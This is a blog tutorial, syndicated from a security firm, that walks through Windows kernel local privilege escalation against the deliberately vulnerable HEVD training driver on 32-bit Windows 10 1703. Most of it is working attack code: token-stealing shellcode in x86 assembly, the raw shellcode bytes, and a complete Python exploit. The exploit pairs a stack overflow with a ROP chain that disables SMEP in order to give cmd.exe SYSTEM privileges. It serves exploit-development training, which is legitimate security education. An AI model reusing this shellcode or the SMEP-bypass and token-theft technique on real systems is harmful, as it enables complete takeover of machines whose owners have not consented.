This is the fourth article on where we’ve been through Windows Kernel
exploitation, using HackSys Extremely Vulnerable
Driver
or HEVD as the target. In the previous articles, we’ve covered:

• Lab setup, describing the tools and
  environment needed to do Windows Kernel debugging.

• Denial of Service in which we performed an initial
  attack to HEVD.

• kASLR SMEP were also successfully bypassed
  and we could execute a simple shellcode in kernel mode.

In this article we will be able to obtain a privileged SYSTEM shell,
performing a Local Privilege Escalation by stealing security tokens. We
will also need to successfully resume execution of our OS after the
attack, to avoid any crash.

Security token stealing

When we are attacking the kernel, we are supposed to have unprivileged
access to the target machine. That’s why the common exploit goal is to
perform Local Privilege Escalation which means to get full privileges on
the OS. There are several
methods
that can be used to do that. Most of them (ab)use the privilege model
implemented by Windows.

In Windows, when the system starts, a process called System is
created, always with PID 4. As this process is owned by the SYSTEM
user, we will use this as the target process to steal the ticket from.

Each process has a EPROCESS structure.

One of the members of that structure is Token which is a ticket
granted by the LSASS process.

The token is used to perform operations on the system based on the
permissions granted to it. For example, if a process wants to read a
file, that file security descriptor will check if the token of process
has the permissions to do it. This is what is known as Discretionary
Access Control List or DACL.

In Windows, the SYSTEM token has all the permissions granted on all
the system objects (files, processes, devices, pipes, etc). That’s why,
if we are able to steal that token and insert it to a non-privileged
process, that process will gain SYSTEM privileges.

To do that, we first need to get the offset of the Token field in the
EPROCESS structure:

As you see, it is at _EPROCESS+0x0fc. With that, we need to get the
SYSTEM process descriptor:

Then, we need to get the value of the token for the SYSTEM process:

Now, we launch a cmd.exe process on the target OS and get the current
privileges:

We must get the cmd.exe process descriptor:

Finally, we must copy the value of the token of the SYSTEM process to
the cmd.exe process. Let’s see it in action:

Wonderful! As you can see, our cmd.exe is now running as nt authority\system!

NOTE: We need to remember that the offsets described in this article
are only applicable for the Windows version that we are currently using:
Windows 10 1703 32 bits.

Now, we must make this process programmatically if we want to include it
in our exploit. The strategy is the following:

• Look for a fixed starting point that we can use to calculate
  offsets, using position-independent code.

• Get the current process list.

• Find the cmd.exe process.

• Find the SYSTEM process (with PID 4).

• Grab the Token from the SYSTEM process.

• Copy the token from process SYSTEM to the cmd.exe process.

• Restore execution.

• Enjoy.

The first step is to find a fixed position from where we can get the
required structures as an offset. According to this
entry, we
can access the _NT_TIB structure from the fs segment selector. This
structure holds information of the current running thread (in our case,
that would be the exploit). The article also says that we can reach the
_KTHREAD structure at fs+0x124. With that, we can start writing some
assembler:

pushad                                  ; Save current registersmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD

In the _KTHREAD structure we can find an offset to the _KPROCESS.

It turns out that _KPROCESS is the first field of _EPROCESS, which
means that we can access the _EPROCESS structure at _KTHREAD+0x150:

pushad                                  ; Save current registersmov eax, dword fs:[0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS

The _EPROCESS structure holds the required offsets to the other needed
information:

• _EPROCESS+0x0b8 points to ActiveProcessLinks which is a linked
  list holding the current running processes, and _EPROCESS+0x0b4
  points to the current process PID:

• _EPROCESS+0x140 points to InheritedFromUniqueProcessId which
  will contain the PID of the parent process, in our case the PID
  of cmd.exe:

With that, we need to save the PID of cmd.exe:

pushad                                  ; Save current registersmov eax, dword fs:[0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESSmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID

Now we need to traverse the ActiveProcessLinks list to find the
_EPROCESS structure for the cmd.exe process:

pushad                                  ; Save current registersmov eax, dword [fs:0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESSmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PIDmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinksfind_cmd:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`jne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks

Then, find the _EPROCESS structure for the SYSTEM process:

pushad                                  ; Save current registersmov eax, dword [fs:0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESSmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PIDmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinksfind_cmd:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`jne find_cmd                            ; If not, go to the next entry of ActiveProcessLinksmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESSmov ecx, eax                            ; Rewind to interate using ECX over ActiveProcessLinksfind_system:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEMjne find_system                         ; If not, go to the next entry of ActiveProcessLinks

We then must move the token from SYSTEM to cmd.exe:

pushad                                  ; Save current registersmov eax, dword [fs:0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESSmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PIDmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinksfind_cmd:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`jne find_cmd                            ; If not, go to the next entry of ActiveProcessLinksmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESSmov ecx, eax                            ; Rewind to interate using ECX over ActiveProcessLinksfind_system:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEMjne find_system                         ; If not, go to the next entry of ActiveProcessLinksadd ecx, 0x0fc                          ; ECX now points to the Token of SYSTEMmov ecx, [ecx]                          ; Copy contents of Token to ECXmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exe

And finally restore execution. As we are writing in the stack, we had
surely mangled immediate stack frames of caller functions. If we look at
the stack after executing the shellcode, we can see that there is a
stack frame at which we can return to, located at esp+0x10:

With that, we can add a restore point to our shellcode:

pushadmov eax, dword [fs:0x124]               ; EAX now points to _KTHREADmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESSmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PIDmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinksfind_cmd:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`jne find_cmd                            ; If not, go to the next entry of ActiveProcessLinksmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESSmov ecx, eax                            ; Rewind to interate using ECX over ActiveProcessLinksfind_system:mov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks                                        ; of current processsub ecx, 0x0b8                          ; Point to current _EPROCESScmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEMjne find_system                         ; If not, go to the next entry of ActiveProcessLinksadd ecx, 0x0fc                          ; ECX now points to the Token of SYSTEMmov ecx, [ecx]                          ; Copy contents of Token to ECXmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exepopad                                   ; Restorexor eax,eaxinc eaxadd esp,0x10pop ebpret 8

Now, we can compile that code with:

> nasm -f elf32 -o steal.o steal.asm

And get the shellcode with:

$ for i in $(objdump -d steal.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo\x60\x64\xa1\x24\x01\x00\x00\x8b\x80\x50\x01\x00\x00\x8b\x90\x40\x01\x00\x00\x89\xc1\x8b\x89\xb8\x00\x00\x00\x81\xe9\xb8\x00\x00\x00\x39\x91\xb4\x00\x00\x00\x75\xec\x89\xcf\x89\xc1\x8b\x89\xb8\x00\x00\x00\x81\xe9\xb8\x00\x00\x00\x83\xb9\xb4\x00\x00\x00\x04\x75\xeb\x81\xc1\xfc\x00\x00\x00\x8b\x09\x89\x8f\xfc\x00\x00\x00\x61\x31\xc0\x40\x83\xc4\x10\x5d\xc2\x08\x00

Let’s pick the exploit from the last post, and
update the shellcode. I also added some print calls that helps to
trace at what stage of the exploit we are now:

#!/usr/bin/env python3"""HackSysExtremeVulnerableDrive Stack Overflow.Vulnerable Software: HackSysExtremeVulnerableDriveVersion: 3.00Exploit Author: Andres RoldanTested On: Windows 10 1703Writeup: https://fluidattacks.com/blog/hevd-privilege-escalation/"""import structimport sysfrom ctypes import windll, c_int, c_ulong, byref, sizeoffrom infi.wioctl import DeviceIoControlKERNEL32 = windll.kernel32PSAPI = windll.psapiDEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'IOCTL_HEVD_STACK_OVERFLOW = 0x222003def get_kernel_base():    """Obtain kernel base address."""    buff_size = 0x4    base = (c_ulong * buff_size)(0)    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):        print('Failed to get kernel base address.')        sys.exit(1)    return base[0]BASE_ADDRESS = get_kernel_base()print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')SHELLCODE = (    b'\x60\x64\xa1\x24\x01\x00\x00\x8b\x80\x50\x01\x00\x00\x8b\x90\x40\x01'    b'\x00\x00\x89\xc1\x8b\x89\xb8\x00\x00\x00\x81\xe9\xb8\x00\x00\x00\x39'    b'\x91\xb4\x00\x00\x00\x75\xec\x89\xcf\x89\xc1\x8b\x89\xb8\x00\x00\x00'    b'\x81\xe9\xb8\x00\x00\x00\x83\xb9\xb4\x00\x00\x00\x04\x75\xeb\x81\xc1'    b'\xfc\x00\x00\x00\x8b\x09\x89\x8f\xfc\x00\x00\x00\x61\x31\xc0\x40\x83'    b'\xc4\x10\x5d\xc2\x08\x00')print('Allocating memory for shellcode...')RET_PTR = KERNEL32.VirtualAlloc(    c_int(0),                    # lpAddress    c_int(len(SHELLCODE)),       # dwSize    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE)print('Moving shellcode to heap...')KERNEL32.RtlMoveMemory(    c_int(RET_PTR),              # Destination    SHELLCODE,                   # Source    c_int(len(SHELLCODE))        # Length)print('Creating ROP chain...')ROP_CHAIN = (    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8    struct.pack('<L', 0x42424242) +                    #    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode)PAYLOAD = (    b'A' * 2080 +    ROP_CHAIN)SIZE = len(PAYLOAD)print('Opening driver handle...')HANDLE = DeviceIoControl(DEVICE_NAME)print('Sending payload...')HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)print('Done.')sys.exit(0)

And check it:

Glorious! We were able to steal the token of the SYSTEM process and
copy it to our cmd.exe shell. Now, we own the system!

Conclusions

It was fun to steal the SYSTEM process token and pass it to our own
parent process. There are many other ways of gaining Local Privilege
Escalation but this method is one of the most used because it is
extremely reliable if you can restore the execution of the kernel.

Recent Articles By Author

• OSEE, an Unexpected Journey
• CNAs Intelligence
• OSEP Review

More from Andres Roldan

*** This is a Security Bloggers Network syndicated blog from Fluid Attacks RSS Feed authored by Andres Roldan. Read the original post at: https://fluidattacks.com/blog/hevd-privilege-escalation/